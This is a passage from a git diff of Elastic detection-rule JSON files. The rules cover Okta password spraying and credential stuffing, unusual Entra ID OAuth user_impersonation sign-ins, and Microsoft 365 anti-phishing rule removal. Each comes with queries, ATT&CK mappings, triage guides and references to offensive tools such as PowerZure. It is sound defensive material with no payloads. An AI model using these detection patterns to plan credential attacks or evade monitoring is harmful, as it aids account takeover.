- "https://github.com/hausec/PowerZure", - "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a", - "https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "8ddab73b-3d15-4e5d-9413-47f05553c1d7", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Configuration Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "8ddab73b-3d15-4e5d-9413-47f05553c1d7_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_204.json b/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_204.json deleted file mode 100644 index bfd05e9980d..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_204.json +++ /dev/null @@ -1,78 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. 
Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts.", - "false_positives": [ - "Users may share an endpoint related to work or personal use in which separate Okta accounts are used.", - "Shared systems such as Kiosks and conference room computers may be used by multiple users." - ], - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Multiple Okta User Authentication Events with Client Address", - "note": "## Triage and analysis\n\n### Investigating Multiple Okta User Authentication Events with Client Address\n\nThis rule detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. Note that Okta does not log unrecognized usernames supplied during authentication attempts, so this rule may not detect all credential stuffing attempts or may indicate a targeted attack.\n\n#### Possible investigation steps:\nSince this is an ES|QL rule, the `okta.actor.alternate_id` and `okta.client.ip` values can be used to pivot into the raw authentication events related to this activity.\n- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- Review the `okta.security_context.is_proxy` field to determine if the device is a proxy.\n - If the device is a proxy, this may indicate that a user is using a proxy to access multiple accounts for password spraying.\n- With the list of `okta.actor.alternate_id` values, review `event.outcome` results to determine if the authentication was successful.\n - If the authentication was successful for any user, pivoting to `event.action` values for those users may provide additional context.\n- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field.\n - Historical analysis should indicate if this device token hash is commonly associated with the user.\n- Review the `okta.event_type` field to determine the type of authentication event that occurred.\n - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons.\n - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying.\n - If the event type is `user.session.start`, the source may have attempted to establish a session via the Okta authentication API.\n- Examine the `okta.outcome.result` field to determine if the authentication was successful.\n- Review the past activities of the actor(s) involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n - This may help determine the authentication and authorization actions that occurred between the user, Okta and application.\n\n### False positive analysis:\n- A user may have legitimately started a session via a 
proxy for security or privacy reasons.\n- Users may share an endpoint related to work or personal use in which separate Okta accounts are used.\n - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons.\n - Shared systems such as Kiosks and conference room computers may be used by multiple users.\n - Shared working spaces may have a single endpoint that is used by multiple users.\n\n### Response and remediation:\n- Review the profile of the users involved in this action to determine if proxy usage may be expected.\n- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required.\n- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involves and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the users.\n- If any of the users are not legitimate, consider deactivating the user's account.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.\n - If so, confirm with the user this was a legitimate request.\n - If so and this was not a legitimate request, consider deactivating the user's account temporarily.\n - Reset passwords and reset MFA for the user.\n- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule.\n - This will prevent future occurrences of this event for this device from triggering the rule.\n - Alternatively adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule.\n - This should be done with caution as it may prevent legitimate alerts from being generated.\n", - "query": "FROM logs-okta*\n| WHERE\n event.dataset == \"okta.system\"\n AND (event.action == \"user.session.start\" OR event.action RLIKE \"user\\\\.authentication(.*)\")\n AND okta.outcome.reason == \"INVALID_CREDENTIALS\"\n| KEEP okta.client.ip, okta.actor.alternate_id, okta.actor.id, event.action, okta.outcome.reason\n| STATS\n source_auth_count = COUNT_DISTINCT(okta.actor.id)\n BY okta.client.ip, okta.actor.alternate_id\n| WHERE\n source_auth_count > 5\n| SORT\n source_auth_count DESC\n", - "references": [ - "https://support.okta.com/help/s/article/How-does-the-Device-Token-work?language=en_US", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", - "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", - "https://www.okta.com/resources/whitepaper-how-adaptive-mfa-can-help-in-mitigating-brute-force-attacks/", - "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", - "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" - ], - "risk_score": 21, - "rule_id": "94e734c0-2cda-11ef-84e1-f661ea17fbce", - "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential 
Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - } - ] - }, - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.004", - "name": "Credential Stuffing", - "reference": "https://attack.mitre.org/techniques/T1110/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 204 - }, - "id": "94e734c0-2cda-11ef-84e1-f661ea17fbce_204", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_207.json b/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_207.json index cdab09de63e..df058ebf77b 100644 --- a/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_207.json +++ b/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_207.json @@ -23,6 +23,12 @@ "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" ], + "related_integrations": [ + { + "package": "okta", + "version": "^3.0.0" + } + ], "risk_score": 21, "rule_id": "94e734c0-2cda-11ef-84e1-f661ea17fbce", "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", diff --git a/packages/security_detection_engine/kibana/security_rule/9563dace-5822-11f0-b1d3-f661ea17fbcd_3.json b/packages/security_detection_engine/kibana/security_rule/9563dace-5822-11f0-b1d3-f661ea17fbcd_3.json new file mode 100644 index 00000000000..f3beeb72276 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9563dace-5822-11f0-b1d3-f661ea17fbcd_3.json @@ -0,0 +1,182 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing user_impersonation for a token issued by Entra ID. Adversaries may use this scope to gain unauthorized access to user accounts, particularly when the sign-in session status is unbound, indicating that the session is not associated with a specific device or session. This behavior is indicative of potential account compromise or unauthorized access attempts. 
This rule flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "filebeat-*", + "logs-azure.signinlogs-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "azure.correlation_id", + "azure.signinlogs.category", + "azure.signinlogs.identity", + "azure.signinlogs.properties.app_display_name", + "azure.signinlogs.properties.app_id", + "azure.signinlogs.properties.app_owner_tenant_id", + "azure.signinlogs.properties.authentication_requirement", + "azure.signinlogs.properties.client_credential_type", + "azure.signinlogs.properties.conditional_access_status", + "azure.signinlogs.properties.device_detail.operating_system", + "azure.signinlogs.properties.is_interactive", + "azure.signinlogs.properties.session_id", + "azure.signinlogs.properties.user_principal_name", + "azure.signinlogs.properties.user_type", + "azure.signinlogs.result_signature", + "azure.tenant_id", + "source.address", + "user.id" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "Entra ID OAuth user_impersonation Scope for Unusual User and Client", + "new_terms_fields": [ + "azure.signinlogs.properties.user_principal_name", + "azure.signinlogs.properties.app_id" + ], + "note": "## Triage and Analysis\n\n### Investigating Entra ID OAuth user_impersonation Scope for Unusual User and Client\n\nIdentifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing `user_impersonation`, and a token issuer type of `AzureAD`. This rule is designed to detect suspicious\nOAuth user impersonation attempts in Microsoft Entra ID, particularly those involving the `user_impersonation` scope, which is often used by adversaries to gain unauthorized access to user accounts. The rule focuses on sign-in events where\nthe sign-in session status is `unbound`, indicating that the session is not associated with a specific device or session, making it more vulnerable to abuse. This behavior is indicative of potential account compromise or\nunauthorized access attempts, especially when the user type is `Member` and the sign-in outcome is `success`. The rule aims to identify these events to facilitate timely investigation and response to potential security incidents. This is a New Terms rule that flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity.\n\n### Possible investigation steps\n\n- Review the `azure.signinlogs.properties.user_principal_name` field to identify the user principal involved in the OAuth workflow.\n- Check the `azure.signinlogs.properties.authentication_processing_details.Oauth Scope Info` field for the presence of `user_impersonation`. This scope is commonly used in OAuth flows to allow applications to access user resources on behalf of the user.\n- Confirm that the `azure.signinlogs.properties.authentication_requirement` is set to `singleFactorAuthentication`, indicating that the sign-in did not require multi-factor authentication (MFA). This can be a red flag, as MFA is a critical security control that helps prevent unauthorized access.\n- Review the `azure.signinlogs.properties.app_display_name` or `azure.signinlogs.properties.app_id` to identify the application involved in the OAuth workflow. 
Check if this application is known and trusted, or if it appears suspicious or unauthorized. FOCI applications are commonly abused by adversaries to evade security controls or conditional access policies.\n- Analyze the `azure.signinlogs.properties.client_ip` to determine the source of the sign-in attempt. Look for unusual or unexpected IP addresses, especially those associated with known malicious activity or geographic locations that do not align with the user's typical behavior.\n- Examine the `azure.signinlogs.properties.resource_display_name` or `azure.signinlogs.properties.resource_id` to identify the resource being accessed during the OAuth workflow. This can help determine if the access was legitimate or if it targeted sensitive resources. It may also help pivot to other related events or activities.\n- Use the `azure.signinlogs.properties.session_id` or `azure.signinlogs.properties.correlation_id` to correlate this event with other related sign-in events or activities. This can help identify patterns of suspicious behavior or potential account compromise.\n\n### False positive analysis\n\n- Some legitimate applications may use the `user_impersonation` scope for valid purposes, such as accessing user resources on behalf of the user. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals.\n- Users may occasionally authenticate using single-factor authentication for specific applications or scenarios, especially in environments where MFA is not enforced or required. If this is expected behavior, consider adjusting the rule or adding exceptions for specific user principals or applications.\n- Some applications may use the `user_impersonation` scope for legitimate purposes, such as accessing user resources in a controlled manner. 
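The investigation steps above suggest pivoting on the flagged principal and reviewing the applications, source addresses, and sessions behind its single-factor sign-ins. A minimal sketch of that pivot with the Python Elasticsearch client, assuming placeholder endpoint, credentials, and principal, and that the listed sign-in log fields are mapped as keywords in your environment:

```python
from elasticsearch import Elasticsearch

# Placeholder endpoint and credentials; adapt to your environment.
es = Elasticsearch("https://localhost:9200", api_key="<api-key>")

# Placeholder principal taken from the alert.
principal = "user@example.com"

# List recent successful single-factor sign-ins for the principal, along with
# the application, session, and source address behind each one.
response = es.search(
    index="logs-azure.signinlogs-*",
    size=50,
    sort=[{"@timestamp": "desc"}],
    query={
        "bool": {
            "filter": [
                {"term": {"event.dataset": "azure.signinlogs"}},
                {"term": {"azure.signinlogs.properties.user_principal_name": principal}},
                {"term": {"azure.signinlogs.properties.authentication_requirement": "singleFactorAuthentication"}},
                {"term": {"event.outcome": "success"}},
            ]
        }
    },
    source_includes=[
        "@timestamp",
        "azure.signinlogs.properties.app_id",
        "azure.signinlogs.properties.app_display_name",
        "azure.signinlogs.properties.session_id",
        "source.address",
    ],
)

for hit in response["hits"]["hits"]:
    print(hit["_source"])
```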
If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals.\n\n### Response and remediation\n\n- Contact the user to validate the OAuth workflow and assess whether they were targeted or tricked by a malicious actor.\n- If the OAuth workflow is confirmed to be malicious:\n - Block the user account and reset the password to prevent further unauthorized access.\n - Revoke active sessions and refresh tokens associated with the user principal.\n - Review the application involved in the OAuth workflow and determine if it should be blocked or removed from the tenant.\n - Investigate the source of the sign-in attempt, including the application and IP address, to determine if there are any additional indicators of compromise or ongoing malicious activity.\n - Monitor the user account and related resources for any further suspicious activity or unauthorized access attempts, and take appropriate actions to mitigate any risks identified.\n- Educate users about the risks associated with OAuth user impersonation and encourage them to use more secure authentication methods, such as OAuth 2.0 or OpenID Connect, whenever possible.\n", + "query": "event.dataset: azure.signinlogs and\n azure.signinlogs.properties.authentication_processing_details: *user_impersonation* and\n azure.signinlogs.properties.authentication_requirement: \"singleFactorAuthentication\" and\n azure.signinlogs.properties.token_issuer_type: \"AzureAD\" and\n azure.signinlogs.properties.token_protection_status_details.sign_in_session_status: \"unbound\" and\n azure.signinlogs.properties.user_type: \"Member\" and\n azure.signinlogs.properties.conditional_access_status: \"notApplied\" and\n not user_agent.original: Mozilla*PKeyAuth/1.0 and\n not azure.signinlogs.properties.device_detail.operating_system: (Ios* or Android*) and\n event.outcome: \"success\"\n and not azure.signinlogs.properties.app_id: (\n \"a5f63c0-b750-4f38-a71c-4fc0d58b89e2\" or\n \"6bc3b958-689b-49f5-9006-36d165f30e00\" or\n \"66a88757-258c-4c72-893c-3e8bed4d6899\" or\n \"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\" or\n \"0000000c-0000-0000-c000-000000000000\"\n )\n", + "references": [ + "https://github.com/Flangvik/TeamFiltration", + "https://www.proofpoint.com/us/blog/threat-insight/attackers-unleash-teamfiltration-account-takeover-campaign" + ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.signinlogs.properties.app_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.authentication_processing_details", + "type": "flattened" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.authentication_requirement", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.conditional_access_status", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.device_detail.operating_system", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.token_issuer_type", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.token_protection_status_details.sign_in_session_status", + "type": "unknown" + }, + { + "ecs": false, + "name": "azure.signinlogs.properties.user_type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"user_agent.original", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9563dace-5822-11f0-b1d3-f661ea17fbcd", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Identity", + "Use Case: Threat Detection", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Sign-In Logs", + "Tactic: Initial Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1550", + "name": "Use Alternate Authentication Material", + "reference": "https://attack.mitre.org/techniques/T1550/", + "subtechnique": [ + { + "id": "T1550.001", + "name": "Application Access Token", + "reference": "https://attack.mitre.org/techniques/T1550/001/" + } + ] + }, + { + "id": "T1656", + "name": "Impersonation", + "reference": "https://attack.mitre.org/techniques/T1656/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 3 + }, + "id": "9563dace-5822-11f0-b1d3-f661ea17fbcd_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/95b99adc-2cda-11ef-84e1-f661ea17fbce_204.json b/packages/security_detection_engine/kibana/security_rule/95b99adc-2cda-11ef-84e1-f661ea17fbce_204.json deleted file mode 100644 index 744c5501e30..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/95b99adc-2cda-11ef-84e1-f661ea17fbce_204.json +++ /dev/null @@ -1,78 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects when a high number of Okta user authentication events are reported for multiple users in a short time frame. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts.", - "false_positives": [ - "Users may share an endpoint related to work or personal use in which separate Okta accounts are used.", - "Shared systems such as Kiosks and conference room computers may be used by multiple users." - ], - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Multiple Okta User Authentication Events with Same Device Token Hash", - "note": "## Triage and analysis\n\n### Investigating Multiple Okta User Authentication Events with Same Device Token Hash\n\nThis rule detects when a high number of Okta user authentication events are reported for multiple users in a short time frame. Adversaries may attempt to launch a credential stuffing attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. 
Note that Okta does not log unrecognized usernames supplied during authentication attempts, so this rule may not detect all credential stuffing attempts or may indicate a targeted attack.\n\n#### Possible investigation steps:\n- Since this is an ES|QL rule, the `okta.actor.alternate_id` and `okta.debug_context.debug_data.dt_hash` values can be used to pivot into the raw authentication events related to this activity.\n- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- Review the `okta.security_context.is_proxy` field to determine if the device is a proxy.\n - If the device is a proxy, this may indicate that a user is using a proxy to access multiple accounts for password spraying.\n- With the list of `okta.actor.alternate_id` values, review `event.outcome` results to determine if the authentication was successful.\n - If the authentication was successful for any user, pivoting to `event.action` values for those users may provide additional context.\n- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field.\n - Historical analysis should indicate if this device token hash is commonly associated with the user.\n- Review the `okta.event_type` field to determine the type of authentication event that occurred.\n - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons.\n - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying.\n- Examine the `okta.outcome.result` field to determine if the authentication was successful.\n- Review the past activities of the actor(s) involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n - This may help determine the authentication and authorization actions that occurred between the user, Okta and application.\n\n### False positive analysis:\n- A user may have legitimately started a session via a proxy for security or privacy reasons.\n- Users may share an endpoint related to work or personal use in which separate Okta accounts are used.\n - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons.\n - Shared systems such as Kiosks and conference room computers may be used by multiple users.\n - Shared working spaces may have a single endpoint that is used by multiple users.\n\n### Response and remediation:\n- Review the profile of the users involved in this action to determine if proxy usage may be expected.\n- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required.\n- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involves and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the users.\n- If any of the users are not legitimate, consider deactivating the user's account.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- Check with 
internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.\n - If so, confirm with the user this was a legitimate request.\n - If so and this was not a legitimate request, consider deactivating the user's account temporarily.\n - Reset passwords and reset MFA for the user.\n- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule.\n - This will prevent future occurrences of this event for this device from triggering the rule.\n", - "query": "FROM logs-okta*\n| WHERE\n event.dataset == \"okta.system\"\n AND (event.action RLIKE \"user\\\\.authentication(.*)\" OR event.action == \"user.session.start\")\n AND okta.debug_context.debug_data.dt_hash != \"-\"\n AND okta.outcome.reason == \"INVALID_CREDENTIALS\"\n| KEEP event.action, okta.debug_context.debug_data.dt_hash, okta.actor.id, okta.actor.alternate_id, okta.outcome.reason\n| STATS\n target_auth_count = COUNT_DISTINCT(okta.actor.id)\n BY okta.debug_context.debug_data.dt_hash, okta.actor.alternate_id\n| WHERE\n target_auth_count > 20\n| SORT\n target_auth_count DESC\n", - "references": [ - "https://support.okta.com/help/s/article/How-does-the-Device-Token-work?language=en_US", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", - "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", - "https://www.okta.com/resources/whitepaper-how-adaptive-mfa-can-help-in-mitigating-brute-force-attacks/", - "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", - "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" - ], - "risk_score": 21, - "rule_id": "95b99adc-2cda-11ef-84e1-f661ea17fbce", - "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - } - ] - }, - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.004", - "name": "Credential Stuffing", - "reference": "https://attack.mitre.org/techniques/T1110/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 204 - }, - "id": "95b99adc-2cda-11ef-84e1-f661ea17fbce_204", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/95b99adc-2cda-11ef-84e1-f661ea17fbce_207.json b/packages/security_detection_engine/kibana/security_rule/95b99adc-2cda-11ef-84e1-f661ea17fbce_207.json index 394c2522675..d2f5f5696e9 100644 --- a/packages/security_detection_engine/kibana/security_rule/95b99adc-2cda-11ef-84e1-f661ea17fbce_207.json +++ 
b/packages/security_detection_engine/kibana/security_rule/95b99adc-2cda-11ef-84e1-f661ea17fbce_207.json @@ -23,6 +23,12 @@ "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" ], + "related_integrations": [ + { + "package": "okta", + "version": "^3.0.0" + } + ], "risk_score": 21, "rule_id": "95b99adc-2cda-11ef-84e1-f661ea17fbce", "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", diff --git a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_207.json b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_207.json deleted file mode 100644 index d697f622593..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks.", - "false_positives": [ - "An anti-phishing rule may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Anti-Phish Rule Modification", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Anti-Phish Rule Modification\n\nMicrosoft 365's anti-phishing rules are crucial for safeguarding users against phishing attacks by enhancing detection and prevention settings. Adversaries may attempt to modify or disable these rules to facilitate phishing campaigns, gaining unauthorized access. 
The detection rule monitors for successful modifications or disabling of anti-phishing rules, signaling potential malicious activity by tracking specific actions within the Exchange environment.\n\n### Possible investigation steps\n\n- Review the event logs for entries with event.dataset set to o365.audit and event.provider set to Exchange to confirm the context of the alert.\n- Check the event.action field for \"Remove-AntiPhishRule\" or \"Disable-AntiPhishRule\" to identify the specific action taken on the anti-phishing rule.\n- Verify the event.outcome field to ensure the action was successful, indicating a potential security concern.\n- Identify the user or account associated with the modification by examining the relevant user fields in the event log.\n- Investigate the user's recent activity and access patterns to determine if there are any other suspicious actions or anomalies.\n- Assess the impact of the rule modification by reviewing any subsequent phishing attempts or security incidents that may have occurred.\n- Consider reverting the changes to the anti-phishing rule and implementing additional security measures if unauthorized access is confirmed.\n\n### False positive analysis\n\n- Administrative changes: Legitimate administrative tasks may involve modifying or disabling anti-phishing rules for testing or configuration purposes. To manage this, create exceptions for known administrative accounts or scheduled maintenance windows.\n- Security audits: Regular security audits might require temporary adjustments to anti-phishing rules. Document these activities and exclude them from alerts by correlating with audit logs.\n- Third-party integrations: Some third-party security tools may interact with Microsoft 365 settings, triggering rule modifications. Identify these tools and exclude their actions from triggering alerts by using their specific identifiers.\n- Policy updates: Organizational policy changes might necessitate updates to anti-phishing rules. 
Ensure these changes are documented and exclude them from alerts by associating them with approved change management processes.\n\n### Response and remediation\n\n- Immediately isolate the affected user accounts to prevent further unauthorized access and potential spread of phishing attacks.\n- Revert any unauthorized changes to the anti-phishing rules by restoring them to their previous configurations using backup or documented settings.\n- Conduct a thorough review of recent email logs and user activity to identify any potential phishing emails that may have bypassed the modified rules and take steps to quarantine or delete them.\n- Notify the security team and relevant stakeholders about the incident, providing details of the rule modification and any identified phishing attempts.\n- Escalate the incident to the incident response team for further investigation and to determine if additional systems or data have been compromised.\n- Implement enhanced monitoring and alerting for any further attempts to modify anti-phishing rules, ensuring that similar activities are detected promptly.\n- Review and update access controls and permissions for administrative actions within Microsoft 365 to ensure that only authorized personnel can modify security settings.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-AntiPhishRule\" or \"Disable-AntiPhishRule\") and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishrule?view=exchange-ps", - "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-antiphishrule?view=exchange-ps" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "97314185-2568-4561-ae81-f3e480e5e695", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - 